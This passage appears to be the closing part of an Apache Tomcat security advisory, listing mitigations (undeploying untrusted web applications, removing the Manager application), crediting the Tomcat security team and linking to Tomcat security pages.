- Undeploy untrusted web applications
- Remove the Manager application

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html